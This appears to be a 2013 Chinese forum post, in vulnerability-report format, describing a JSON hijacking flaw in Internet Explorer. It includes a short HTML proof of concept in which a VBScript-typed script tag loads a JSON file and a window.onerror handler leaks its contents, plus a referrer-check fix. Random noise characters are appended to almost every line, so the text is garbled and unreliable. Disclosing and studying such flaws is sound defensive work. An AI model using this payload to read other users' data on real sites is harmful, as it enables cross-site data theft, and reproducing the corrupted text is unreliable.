简要描述:5 X' `" l3 _# ]2 j4 Y
$ D' ~9 r0 B0 Q* \8 d: y
由于某些资源容器对数据处理不当导致json劫持漏洞./ J# p5 E' R9 B9 X7 M5 Y$ G
详细说明:; l- w+ m- o4 C+ p7 s; o/ R
由于ie支持vbscript,所以script元素可以指定成vbscript语言:0 t0 E9 J+ `1 c6 F/ |+ w
<script language=vbscript></script>4 S% p9 w) ^" ] L2 ]3 C" Y
- e2 I& a) t7 w9 r1 j
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
; B* ` {0 }- N/ R1 [3 U漏洞证明:
/ b) O1 C/ r& U4 _+ J% R+ j<script>
% O8 L* r0 k8 e2 m/ Qwindow.onerror=function(_){# i0 [; _$ f' k! Y, _" W# n
alert(_)5 Q3 x' p' a) s: H2 Z) b6 y
}+ \& q/ h( C% f2 J7 f
</script>0 d4 s. G+ y( ^
<script language=vbscript src=1.json></script>
' V" F7 `# b& c- a
: @9 B* i$ Q! U: y4 s. ^
4 }) a6 b4 [- V2 a, \' A; \! _1.json:
* h# y$ D7 ~6 w3 M: m[{"name":"sogili","age":19}]3 M+ E4 e" O( }5 ~1 w; S
修复方案:2 y. e! R/ ~8 E; @( y4 O& e9 p8 W
网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对